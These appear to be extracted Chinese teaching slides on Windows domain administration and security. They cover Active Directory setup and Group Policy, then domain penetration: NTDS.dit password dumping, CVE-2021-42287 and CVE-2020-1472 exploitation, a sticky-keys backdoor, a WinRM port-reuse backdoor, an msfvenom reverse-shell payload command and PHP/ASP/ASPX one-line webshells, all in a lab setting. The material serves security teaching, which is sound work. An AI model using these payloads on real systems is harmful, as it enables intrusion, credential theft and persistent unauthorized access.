在“域”模式下,至少有一臺(tái)服務(wù)器負(fù)責(zé)每一臺(tái)聯(lián)入網(wǎng)絡(luò)的電腦和用戶的驗(yàn)證工作,相當(dāng)于一個(gè)單位的門衛(wèi)一樣,稱為“域控制器(DomainController,簡(jiǎn)寫為DC)”?!坝蚩刂破鳌敝邪擞蛇@個(gè)域的賬戶、密碼、屬于這個(gè)域的計(jì)算機(jī)等信息構(gòu)成的數(shù)據(jù)庫(kù)。當(dāng)電腦聯(lián)入網(wǎng)絡(luò)時(shí),域控制器首先要鑒別這臺(tái)電腦是否是屬于這個(gè)域的,用戶使用的登錄賬號(hào)是否存在、密碼是否正確。如果以上信息不正確,域控制器就拒絕這個(gè)用戶從這臺(tái)電腦登錄。不能登錄,用戶就不能訪問服務(wù)器上有權(quán)限保護(hù)的資源,只能以對(duì)等網(wǎng)用戶的方式訪問Windows共享出來(lái)的資源,這樣就一定程度上保護(hù)了網(wǎng)絡(luò)上的資源。

一般情況下,域控制器集成了DNS服務(wù),可以解析域內(nèi)的計(jì)算機(jī)名稱(基于TCP/IP),解決了工作組環(huán)境不同網(wǎng)段計(jì)算機(jī)不能使用計(jì)算機(jī)名互訪的問題。此處添加標(biāo)題Addthistitle必備知識(shí)——域的部署延遲符

部署準(zhǔn)備:(1)安裝者必須具有本地管理員的權(quán)限。(2)操作系統(tǒng)版本必須滿足條件(WindowsServer2003除Web以外的所有都滿足)。(3)本地磁盤必須有一個(gè)NTFS文件系統(tǒng)。(4)有TCP/IP設(shè)置。(5)有相應(yīng)的DNS服務(wù)器支持。(6)有足夠的可用空間。安裝活動(dòng)目錄(AD)步驟:(1)打開AD:開始--運(yùn)行輸入dcpromo。(2)是否創(chuàng)建新域。DC有兩種新域的域控和現(xiàn)有域的額外域控制器。一般選擇新域的域控。(3)輸入新域的DNS全名。(4)輸入新域的NetBIOS名(5)數(shù)據(jù)庫(kù)和日志文件夾。為了優(yōu)化性能,可以將數(shù)據(jù)庫(kù)和日志放在不同的硬盤上。該文件夾不一定在NTFS分區(qū)。如果本計(jì)算機(jī)是域的第一臺(tái)域控,則sam數(shù)據(jù)庫(kù)就會(huì)升級(jí)到C:\Windows\ntds\ntds.dit,本地用戶賬戶變成域用戶賬戶。(6)共享的系統(tǒng)卷。共享系統(tǒng)卷SYSVOL文件夾存放的位置必須是NTFS文件系統(tǒng)。(7)DNS注冊(cè)診斷。AD需要DNS服務(wù)支持。(8)域兼容性。如果網(wǎng)絡(luò)中不存在WindowsServer2003以前版本的域控制器,就選第二項(xiàng)。如果存在選第一項(xiàng)。(9)還原模式密碼。目錄服務(wù)還原模式的管理員密碼,是在目錄服務(wù)還原模式下登錄系統(tǒng)時(shí)使用。由于目錄服務(wù)還原模式下,所有的域賬戶用戶都不能使用,只有使用這個(gè)還原模式管理員賬戶登錄。(10)安裝完成后需重啟計(jì)算機(jī)。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

打開“服務(wù)器管理器”,點(diǎn)擊“添加功能和角色”進(jìn)入“添加角色和功能向?qū)А?,檢查到靜態(tài)IP地址已配置完成,管理員賬戶使用的是強(qiáng)密碼和最新的安全更新在實(shí)驗(yàn)中可以忽略此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

選擇第一項(xiàng)“基于角色或基于功能的安裝”服務(wù)器選擇服務(wù)器池中的本地服務(wù)器此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

服務(wù)器角色中確保已安裝了“DNS服務(wù)器”,如果沒有安裝將“DNS服務(wù)器”勾選上。然后勾選上“ActiveDirectory域服務(wù)”,同時(shí)也在該服務(wù)器上安裝域服務(wù)管理工具此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

在WindowsServer2019上ActiveDirectory域服務(wù)的安裝不需要添加額外的功能,直接點(diǎn)擊“下一步”確認(rèn)選擇無(wú)誤,點(diǎn)擊“安裝”按鈕開始安裝此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

“ActiveDirectory域服務(wù)”安裝完成之后,點(diǎn)擊“將此服務(wù)器提升為域控制器”。如果不慎點(diǎn)了“結(jié)束”按鈕關(guān)閉了向?qū)?,也可以在“服?wù)器管理器”中找到此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

進(jìn)入“ActiveDirectory域服務(wù)配置向?qū)А?,部署操作選擇“添加新林”并輸入根域名,必須使用允許的DNS域命名約定創(chuàng)建新林,“域控制器選項(xiàng)”頁(yè)將顯示以下選項(xiàng)。默認(rèn)情況下,林和域功能級(jí)別設(shè)置為WindowsServer2019此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

安裝DNS服務(wù)器時(shí),應(yīng)該在父域名系統(tǒng)(DNS)區(qū)域中創(chuàng)建指向DNS服務(wù)器且具有區(qū)域權(quán)限的委派記錄。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

確保為域分配了NetBIOS名稱“路徑”頁(yè)可以用于覆蓋ADDS數(shù)據(jù)庫(kù)、數(shù)據(jù)庫(kù)事務(wù)日志和SYSVOL共享的默認(rèn)文件夾位置。默認(rèn)位置始終位于%systemroot%中,保持默認(rèn)即可此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

“審查”選項(xiàng)頁(yè)可以用于驗(yàn)證設(shè)置并確保在開始安裝前滿足要求。這不是停止使用服務(wù)器管理器安裝的最后一次機(jī)會(huì)。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

“審查”選項(xiàng)頁(yè)可以用于驗(yàn)證設(shè)置并確保在開始安裝前滿足要求。這不是停止使用服務(wù)器管理器安裝的最后一次機(jī)會(huì)。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域控制器的設(shè)置延遲符

安裝完畢之后系統(tǒng)會(huì)自動(dòng)重啟,重啟之后將以域管理員的身份登錄,到此,域控制器配置完畢此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——將計(jì)算機(jī)加入到域延遲符

更改DNS地址為域控制器的地址控制面板,選擇“系統(tǒng)和安全->系統(tǒng)->更改設(shè)置”此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——將計(jì)算機(jī)加入到域延遲符

在彈出的計(jì)算機(jī)屬性對(duì)話框中點(diǎn)擊“更改”選擇“域”,輸入創(chuàng)建的域名稱“”此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——將計(jì)算機(jī)加入到域延遲符

如果DNS設(shè)置成功,會(huì)提示輸入密碼對(duì)話框,這時(shí)需要輸入一位已經(jīng)在域中的用戶的用戶名和密碼,并不一定是管理員。當(dāng)輸入的用戶名和密碼驗(yàn)證通過后就可以成功加入到域中搭建域環(huán)境使用組策略管理域環(huán)境滲透Windows域*延遲符本任務(wù)是組策略的使用,為了完成本任務(wù),首先學(xué)習(xí)組策略的理論知識(shí),其次在域中建立組策略對(duì)象GPO,最后手動(dòng)更新組策略,使域用戶在登錄域時(shí)能顯示域控部署的軟件。Windows域管理此處添加標(biāo)題Addthistitle使用組策略管理域環(huán)境任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps本任務(wù)是組策略的使用,為了完成本任務(wù),首先學(xué)習(xí)組策略的理論知識(shí),其次在域中建立組策略對(duì)象GPO,最后手動(dòng)更新組策略,使域用戶在登錄域時(shí)能顯示域控部署的軟件。組策略的定義和作用組策略處理順序新建GPO編輯GPO在容器對(duì)象上鏈接GPO手動(dòng)更新組策略延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——組策略的定義和作用延遲符

組策略(英語(yǔ):GroupPolicy)是微軟WindowsNT家族操作系統(tǒng)的一個(gè)特性,它可以控制用戶賬戶和計(jì)算機(jī)賬戶的工作環(huán)境。組策略提供了操作系統(tǒng)、應(yīng)用程序和活動(dòng)目錄中用戶設(shè)置的集中化管理和配置。組策略的其中一個(gè)版本名為本地組策略(縮寫“LGPO”或“LocalGPO”),這可以在獨(dú)立且非域的計(jì)算機(jī)上管理組策略對(duì)象。組策略在部分意義上是控制用戶可以或不能在計(jì)算機(jī)上做什么,例如:施行密碼復(fù)雜性策略避免用戶選擇過于簡(jiǎn)單的密碼,允許或阻止身份不明的用戶從遠(yuǎn)程計(jì)算機(jī)連接到網(wǎng)絡(luò)共享,阻止訪問Windows任務(wù)管理器或限制訪問特定文件夾。這樣一套配置被稱為組策略對(duì)象(GroupPolicyObject,GPO)。此處添加標(biāo)題Addthistitle必備知識(shí)——組策略處理順序延遲符

本地——任何在本地計(jì)算機(jī)的設(shè)置。在WindowsVista之前,每臺(tái)計(jì)算機(jī)只能有一份本地組策略。在WindowsVista和之后的Windows版本中,允許每個(gè)用戶賬戶分別擁有組策略。站點(diǎn)——任何與計(jì)算機(jī)所在的活動(dòng)目錄站點(diǎn)關(guān)聯(lián)的組策略。(活動(dòng)目錄站點(diǎn)是旨在管理促進(jìn)物理上接近的計(jì)算機(jī)的一種邏輯分組)。如果多個(gè)策略已鏈接到一個(gè)站點(diǎn),將按照管理員設(shè)置的順序處理。域——任何與計(jì)算機(jī)所在Windows域關(guān)聯(lián)的組策略。如果多個(gè)策略已鏈接到一個(gè)域,將按照管理員設(shè)置的順序處理。組織單元——任何與計(jì)算機(jī)或用戶所在的活動(dòng)目錄組織單元(OU)關(guān)聯(lián)的組策略。(OU是幫助組織和管理一組用戶、計(jì)算機(jī)或其他活動(dòng)目錄對(duì)象的邏輯單元)。如果多個(gè)策略已鏈接到一個(gè)OU,將按照管理員設(shè)置的順序處理。組策略設(shè)置內(nèi)部是一個(gè)分層結(jié)構(gòu),父?jìng)髯?、子傳孫,以此類推,這被稱為“繼承”。它可以控制阻止或施行策略應(yīng)用到每個(gè)層級(jí)。如果高級(jí)別的管理員創(chuàng)建了一個(gè)具有繼承性的策略,而低層級(jí)的管理員策略與此相悖,此策略仍將生效。在組策略偏好設(shè)置已配置并且同等的組策略設(shè)置已配置時(shí),組策略設(shè)置將會(huì)優(yōu)先。WMI過濾是組策略通過Windows管理規(guī)范(WMI)過濾器來(lái)選擇應(yīng)用范圍的一個(gè)流程。過濾器允許管理員只應(yīng)用組策略到特定情況,例如特定型號(hào)、內(nèi)存、已安裝軟件或任何WMI可查詢條件的特定情況的計(jì)算機(jī)。通過在計(jì)算機(jī)上建立組策略對(duì)象(GPO),對(duì)GPO進(jìn)行編輯、鏈接、更新等操作,提高計(jì)算機(jī)系統(tǒng)的安全性此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——新建GPO延遲符

在【服務(wù)器管理器】中,依單擊【工具】→【組策略管理】菜單項(xiàng)。出現(xiàn)【組策略管理】窗口,在導(dǎo)航窗格中展開域【】,選擇【組策略對(duì)象】節(jié)點(diǎn),右鍵單擊,從彈出菜單中選擇【新建】菜單項(xiàng)。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——編輯GPO延遲符

在【組策略管理】窗口的導(dǎo)航窗格中展開域【】,選擇【組策略對(duì)象】節(jié)點(diǎn),在詳細(xì)窗格的【內(nèi)容】選項(xiàng)卡中,右鍵單擊“helpdesk”GPO,在彈出菜單中單擊【編輯】菜單項(xiàng)。出現(xiàn)【組策略對(duì)象編輯器】窗口,在導(dǎo)航窗格下依次展開【計(jì)算機(jī)配置】→【策略】→【W(wǎng)indows設(shè)置】→【安全設(shè)置】節(jié)點(diǎn),右鍵單擊【受限制的組】,從彈出菜單中選擇【添加組】菜單項(xiàng)。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——編輯GPO延遲符

出現(xiàn)【helpdesks屬性】對(duì)話框,單擊【這個(gè)組隸屬于】選項(xiàng)旁的的按鈕。出現(xiàn)【組成員身份】對(duì)話框,在【組名】文本框輸入“Administrators”,單擊按鈕。返回【helpdesks屬性】對(duì)話框此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——手動(dòng)更新組策略延遲符

在WindowsServer2019上創(chuàng)建一個(gè)文件夾“C:\softwares”,并將安裝包googlechrom.msi存放到該文件夾內(nèi)。將“C:\softwares”設(shè)置為共享文件夾,作為軟件發(fā)布點(diǎn),共享權(quán)限設(shè)置everyone只有讀取權(quán)限,NTFS權(quán)限使用默認(rèn)值(系統(tǒng)自動(dòng)了賦予everyone讀取權(quán)限)。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——在容器對(duì)象上鏈接GPO延遲符

在【組策略管理】窗口的導(dǎo)航窗格中,右鍵單擊域【】,從彈出菜單中選擇【鏈接現(xiàn)有GPO】菜單項(xiàng)。出現(xiàn)【選擇GPO】對(duì)話框,在【組策略對(duì)象】列表框中選擇組策略對(duì)象“helpdesk”,單擊按鈕。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——在容器對(duì)象上鏈接GPO延遲符

出現(xiàn)【部署軟件】對(duì)話框,選中【已分配】單選按鈕返回【組策略對(duì)象編輯器】窗口,可以看到軟件已經(jīng)分配成功,手動(dòng)應(yīng)用組策略更新。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——在容器對(duì)象上鏈接GPO延遲符

由于該GPO已經(jīng)鏈接到域,直接在命令窗口執(zhí)行命令“gpupdate/force”,刷新組策略,重啟客戶機(jī)Windows10,以域用戶賬戶登錄,驗(yàn)證軟件分配。登錄后屏幕顯示結(jié)果搭建域環(huán)境使用組策略管理域環(huán)境滲透Windows域*延遲符本任務(wù)是本項(xiàng)目的拓展內(nèi)容,本任務(wù)首先介紹如何利用工具對(duì)域內(nèi)的相關(guān)信息進(jìn)行搜集,再次介紹如何從域控制器上導(dǎo)出所有域用戶密碼,最后講述如何利用CVE-2021-42287和CVE-2022-1472漏洞對(duì)域環(huán)境進(jìn)行滲透測(cè)試Windows域管理此處添加標(biāo)題Addthistitle滲透Windows域*任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps本任務(wù)是本項(xiàng)目的拓展內(nèi)容,本任務(wù)首先介紹如何利用工具對(duì)域內(nèi)的相關(guān)信息進(jìn)行搜集,再次介紹如何從域控制器上導(dǎo)出所有域用戶密碼,最后講述如何利用CVE-2021-42287和CVE-2022-1472漏洞對(duì)域環(huán)境進(jìn)行滲透測(cè)試。域滲透基本概念CVE-2021-42287漏洞介紹CVE-2020-1472漏洞介紹

域信息收集導(dǎo)出域用戶密碼

CVE-2021-42287域控漏洞復(fù)現(xiàn)CVE-2020-1472NetLogon權(quán)限提升漏洞延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——域滲透基本概念延遲符

域是Windows下的一種統(tǒng)一化管理的方式,一個(gè)電腦可以用多個(gè)賬號(hào)登錄,有本地用戶和域用戶兩種方式登錄,沒有域環(huán)境和有域環(huán)境的認(rèn)證方式不同,Windows終端的管理,往往會(huì)分為:?jiǎn)为?dú)的主機(jī),工作組,域環(huán)境,三種環(huán)境下認(rèn)證方式均有不同此處添加標(biāo)題Addthistitle必備知識(shí)——CVE-2021-42287漏洞介紹延遲符

CVE-2021-42287,機(jī)器賬戶的名字一般來(lái)說應(yīng)該以$結(jié)尾,但AD(活動(dòng)目錄)沒有對(duì)域內(nèi)機(jī)器賬戶名做驗(yàn)證。此處添加標(biāo)題Addthistitle必備知識(shí)——CVE-2020-1472漏洞介紹延遲符

域控Netlogon特權(quán)提升漏洞(CVE-2020-1472),攻擊者可使用Netlogon遠(yuǎn)程協(xié)議(MS-NRPC)建立與域控制器的連接,連接的安全通道存在特權(quán)提升的漏洞。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域信息收集延遲符

查看當(dāng)前權(quán)限查看管理員組查詢指定用戶詳細(xì)信息此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域信息收集延遲符

查看當(dāng)前登錄域及登錄用戶的信息查詢域內(nèi)所有用戶組列表此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——域信息收集延遲符

查詢所有域內(nèi)成員計(jì)算機(jī)列表獲取域密碼信息查看域控制器組查詢域管理員用戶此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——導(dǎo)出域用戶密碼延遲符

域用戶hash導(dǎo)出原理創(chuàng)建快照加載快照此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——導(dǎo)出域用戶密碼延遲符

拷貝快照中的ntds.dit和system文件卸載快照刪除快照此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——導(dǎo)出域用戶密碼延遲符

使用NTDSDumpEx.exe工具導(dǎo)出域用戶密碼

打開域用戶密碼文件此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——CVE-2021-42287域控漏洞復(fù)現(xiàn)延遲符

/Ascotbe/Kernelhub/tree/master/Windows/CVE-2021-42287域控制器為WIN-8JLDISG6LK7,查看域管理員賬戶并執(zhí)行漏洞利用程序此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——CVE-2021-42287域控漏洞復(fù)現(xiàn)延遲符

此時(shí)域內(nèi)普通用戶擁有了管理員用戶的權(quán)限,輸入“klist”,查看票據(jù),輸入“dir\\dc\c$”,獲取C盤文件此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——CVE-2020-1472NetLogon權(quán)限提升漏洞延遲符

漏洞利用腳本下載地址:/VoidSec/CVE-2020-1472利用漏洞腳本將域控的機(jī)器賬號(hào)密碼置空此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——CVE-2020-1472NetLogon權(quán)限提升漏洞延遲符

利用機(jī)器用戶及空密碼獲取域控administrator用戶的hash此處添加標(biāo)題Addthistitle項(xiàng)目總結(jié)——

Windows域管理延遲符

本項(xiàng)目主要介紹了Windows域環(huán)境的搭建、使用組策略以及如何利用漏洞滲透Windows域。在項(xiàng)目實(shí)施中注重團(tuán)隊(duì)合作精神的培養(yǎng),培養(yǎng)學(xué)生數(shù)據(jù)保護(hù)的意識(shí)。CONTENTS目錄z走進(jìn)Windows服務(wù)器01

Windows服務(wù)器用戶管理02Windows服務(wù)器共享管理03Windows服務(wù)器網(wǎng)站管理04延遲符z06070805Windows服務(wù)器遠(yuǎn)程管理Windows域管理Windows應(yīng)用安全Windows內(nèi)網(wǎng)安全07Windows應(yīng)用安全本項(xiàng)目是Windows應(yīng)用安全,重點(diǎn)介紹與Windows應(yīng)用相關(guān)的漏洞如Windows系統(tǒng)后門、Windows反彈木馬等,通過網(wǎng)站W(wǎng)ebshell應(yīng)用的介紹,使學(xué)生對(duì)Windows服務(wù)器安全有了進(jìn)一步的認(rèn)識(shí)。延遲符Windows應(yīng)用安全Windows應(yīng)用后門WebShell上傳和連接延遲符本任務(wù)介紹了Windows后門的概念、Windows“shift”后門以及如何在Windows遠(yuǎn)程管理中部署端口復(fù)用后門。此處添加標(biāo)題AddthistitleWindows應(yīng)用后門任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps本任務(wù)介紹了Windows后門的概念、Windows“shift”后門以及如何在Windows遠(yuǎn)程管理中部署端口復(fù)用后門。后門Windows系統(tǒng)后門Windows“5次shift”后門Windows端口復(fù)用后門Windows反彈木馬延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——后門延遲符

后門是指繞過安全控制而獲取對(duì)程序或系統(tǒng)訪問權(quán)的方法。主機(jī)上的后門來(lái)源主要有以下幾種:(1)攻擊者利用欺騙的手段,通過發(fā)送電子郵件或者文件,誘使主機(jī)的操作員打開或運(yùn)行藏有木馬程序的郵件或文件,這些木馬程序就會(huì)在主機(jī)上創(chuàng)建一個(gè)后門。(2)攻擊者攻陷一臺(tái)主機(jī),獲得其控制權(quán)后,在主機(jī)上建立后門,比如安裝木馬程序,以便下一次入侵時(shí)使用。(3)這是軟件開發(fā)過程中引入的后門。在軟件的開發(fā)階段,程序員常會(huì)在軟件內(nèi)創(chuàng)建后門以方便測(cè)試或者修改程序中的缺陷,但在軟件發(fā)布時(shí),后門被有意或者無(wú)意忽視了,沒有被刪除,那么這個(gè)軟件天生就存在后門,安裝該軟件的主機(jī)就不可避免的引入了后門。此處添加標(biāo)題Addthistitle必備知識(shí)——Windows系統(tǒng)后門延遲符

Windows系統(tǒng)中通常大部分的服務(wù)都擁有SYSTEM權(quán)限,如果攻擊者利用Windows的服務(wù)機(jī)制創(chuàng)建一個(gè)后門服務(wù),那么這個(gè)后門的持久化性更強(qiáng)。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows“5次shift”后門延遲符

當(dāng)未登陸Windows系統(tǒng)(停留在登陸界面)的時(shí)候,系統(tǒng)還不知道我們將以哪個(gè)用戶登陸,所以在這個(gè)時(shí)候連續(xù)按5次shift,系統(tǒng)將會(huì)以system用戶(具有管理員級(jí)別的權(quán)限)來(lái)運(yùn)行sethc.exe這個(gè)程序。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows“5次shift”后門延遲符

將sethc.exe替換為cmd.exe,連續(xù)按5次shift后,系統(tǒng)將會(huì)以system用戶啟用cmd.exe,無(wú)需登錄即可執(zhí)行命令。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows端口復(fù)用后門延遲符

(1)實(shí)驗(yàn)原理該后門的基本原理是使用Windows的遠(yuǎn)程管理的管理服務(wù)WinRM,組合HTTP.sys驅(qū)動(dòng)自帶的端口復(fù)用功能,一起實(shí)現(xiàn)正向的端口復(fù)用后門。后門連接是需要目標(biāo)服務(wù)器的高權(quán)用戶的明文密碼的,需要先抓取相應(yīng)的明文密碼才可部署后門。首先查看目標(biāo)服務(wù)器時(shí)候能夠正常使用WinRM服務(wù)此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows端口復(fù)用后門延遲符

(1)實(shí)驗(yàn)原理該后門的基本原理是使用Windows的遠(yuǎn)程管理的管理服務(wù)WinRM,組合HTTP.sys驅(qū)動(dòng)自帶的端口復(fù)用功能,一起實(shí)現(xiàn)正向的端口復(fù)用后門。后門連接是需要目標(biāo)服務(wù)器的高權(quán)用戶的明文密碼的,需要先抓取相應(yīng)的明文密碼才可部署后門。(2)環(huán)境檢測(cè)首先查看目標(biāo)服務(wù)器時(shí)候能夠正常使用WinRM服務(wù)此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows端口復(fù)用后門延遲符

(3)復(fù)用80端口目標(biāo)服務(wù)器本身是存在IISWeb應(yīng)用服務(wù),開放端口也是默認(rèn)的80端口此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows端口復(fù)用后門延遲符

對(duì)于原本就開放了WinRM服務(wù)的機(jī)器來(lái)講,需要保留原本的5985端口listener,同時(shí)需要新增一個(gè)80端口的listener,這樣既能保證原來(lái)的5985端口管理員可以使用此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows端口復(fù)用后門延遲符

對(duì)于安裝Windows2012及以上版本操作系統(tǒng)的服務(wù)器來(lái)講,只需要這一條命令即可實(shí)現(xiàn)端口復(fù)用。這種情況下,老的5985端口listener還保留著此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows端口復(fù)用后門延遲符

(4)后門的使用本地需要連接WinRM服務(wù)時(shí),首先也需要配置啟動(dòng)WinRM服務(wù),然后需要設(shè)置信任連接的主機(jī),執(zhí)行以下兩條命令即可此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows端口復(fù)用后門延遲符

開啟WinRM客戶端后,使用winrs命令即可連接遠(yuǎn)程WinRM服務(wù)執(zhí)行命令(這里的賬號(hào)密碼即是目標(biāo)服務(wù)器本地存在的用戶)此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows端口復(fù)用后門延遲符

(5)非管理員用戶登錄WinRM服務(wù)是受UAC影響的,所以本地管理員用戶組里面只有administrator可以登錄,其他管理員用戶是沒法遠(yuǎn)程登錄WinRM的。要允許本地管理員組的其他用戶登錄WinRM,需要修改注冊(cè)表設(shè)置。regaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System/vLocalAccountTokenFilterPolicy/tREG_DWORD/d1/f此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows反彈木馬延遲符

(1)在KaliLinux中模式下輸入如下代碼msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=lport=4444-fexe-oshell.exe此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows反彈木馬延遲符

(2)在KaliLinux中進(jìn)入Metasploit,進(jìn)入反彈木馬模塊,開啟監(jiān)聽模式。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows反彈木馬延遲符

(3)將生成的shell.exe在Windows系統(tǒng)中運(yùn)行,Kali成功連入Windows系統(tǒng)此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

Windows反彈木馬延遲符

Meterpreter是MetasploitFramework提供的最常用的攻擊載荷(payload)之一,如其模式下輸入執(zhí)行shellWindows應(yīng)用安全Windows應(yīng)用后門WebShell上傳和連接延遲符本任務(wù)介紹了木馬的作用、WebShell的分類以及通過Windows網(wǎng)站上傳WebShell,連接后臺(tái)的過程。此處添加標(biāo)題AddthistitleWebShell上傳和連接任務(wù)分析Taskanalysis必備知識(shí)Essentialknowledge任務(wù)實(shí)施Taskimplementation操作步驟Operationsteps本任務(wù)介紹了木馬的作用、WebShell的分類以及通過Windows網(wǎng)站上傳WebShell,連接后臺(tái)的過程。木馬WebShellUpload-labs靶場(chǎng)Upload-labs靶場(chǎng)上傳網(wǎng)站木馬WebShell利用“中國(guó)菜刀”連接木馬網(wǎng)頁(yè)延遲符此處添加標(biāo)題Addthistitle必備知識(shí)——木馬延遲符

木馬病毒是計(jì)算機(jī)黑客用于遠(yuǎn)程控制計(jì)算機(jī)的程序,將控制程序寄生于被控制的計(jì)算機(jī)系統(tǒng)中,里應(yīng)外合對(duì)被感染木馬病毒的計(jì)算機(jī)實(shí)施操作。一般的木馬病毒程序主要是尋找計(jì)算機(jī)后門,伺機(jī)竊取被控計(jì)算機(jī)中的密碼和重要文件等,同時(shí)可以對(duì)被控計(jì)算機(jī)實(shí)施監(jiān)控、資料修改等非法操作。木馬病毒具有很強(qiáng)的隱蔽性,可以根據(jù)黑客意圖突然發(fā)起攻擊。此處添加標(biāo)題Addthistitle必備知識(shí)——WebShell延遲符

“Web”的含義是服務(wù)器開放Web服務(wù);“Shell”的含義是取得對(duì)服務(wù)器某種程度上的操作權(quán)限;“WebShell"就是獲取對(duì)服務(wù)器的控制權(quán)限,這就需要借助一些WebShell管理工具和一些漏洞去得到這種權(quán)限。在使用WebShell管理工具之前,需要先在目標(biāo)服務(wù)器上傳或創(chuàng)建一個(gè)木馬文件。木馬分為大馬、小馬和一句話木馬:(1)小馬:文件體積小、上傳文件、文件修改、文件管理(2)大馬:文件體積較大、功能齊全、能夠提權(quán)、操作數(shù)據(jù)庫(kù)等(不推薦)(3)一句話木馬:短小精悍、功能強(qiáng)大、隱蔽性好、客戶端直接管理(主流)例如:php語(yǔ)言中<?php@eval($_POST['caidao'];?)>asp語(yǔ)言中<%evalrequest("caidao")%>aspx語(yǔ)言中<%@PageLanguage="Jscript"%><%eval(Request.Item["aaa"],"unsafe");%>

此處添加標(biāo)題Addthistitle必備知識(shí)——

Upload-labs靶場(chǎng)延遲符

Upload-Labs是一個(gè)使用PHP語(yǔ)言編寫、專注于文件上傳漏洞的闖關(guān)式網(wǎng)絡(luò)安全靶場(chǎng)。練習(xí)該靶場(chǎng)可以有效地了解并掌握文件上傳漏洞的原理、利用方法和修復(fù)方案。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——WindowsServer2019中安裝網(wǎng)站應(yīng)用延遲符

1)在虛擬機(jī)WindowsServer2019中,點(diǎn)擊桌面phpStudy安裝程序,選擇安裝路徑,單擊按鈕進(jìn)行安裝,安裝之后程序會(huì)啟動(dòng)Apache、MySQL服務(wù)。2)在phpStudy程序目錄下添加upload-labs-master網(wǎng)站,。3)利用物理機(jī)的瀏覽器訪問虛擬機(jī)WindowsServer2019的upload-labs網(wǎng)站。此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

上傳網(wǎng)站木馬WebShell延遲符

(1)在物理機(jī)上創(chuàng)建文件webshell.php,代碼如下:Gif89a<?php@eval($_POST['as']);?>(2)點(diǎn)擊upload-labs網(wǎng)站中的Pass-01(第一關(guān)),單擊上傳按鈕,選擇webshell.php,此時(shí)出現(xiàn)“文件不允許上傳”,(3)查看Pass-01的源代碼如下:<scripttype="text/javascript">functioncheckFile(){varfile=document.getElementsByName('upload_file')[0].value;if(file==null||file==""){alert("請(qǐng)選擇要上傳的文件!");returnfalse;}//定義允許上傳的文件類型varallow_ext=".jpg|.png|.gif";//提取上傳文件的類型varext_name=file.substring(file.lastIndexOf("."));//判斷上傳文件類型是否允許上傳if(allow_ext.indexOf(ext_name)==-1){varerrMsg="該文件不允許上傳,請(qǐng)上傳"+allow_ext+"類型的文件,當(dāng)前文件類型為:"+ext_name;alert(errMsg);returnfalse;}}此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

上傳網(wǎng)站木馬WebShell延遲符

(4)單擊物理機(jī)瀏覽器的設(shè)置選項(xiàng)如圖7-2-7,打開計(jì)算機(jī)的代理設(shè)置如圖7-2-8,在“internet屬性”中單擊局域網(wǎng)設(shè)置,勾選LAN代理,點(diǎn)擊確定”,任務(wù)實(shí)施——

上傳網(wǎng)站木馬WebShell此處添加標(biāo)題Addthistitle任務(wù)實(shí)施——

上傳網(wǎng)站木馬WebShell延遲符

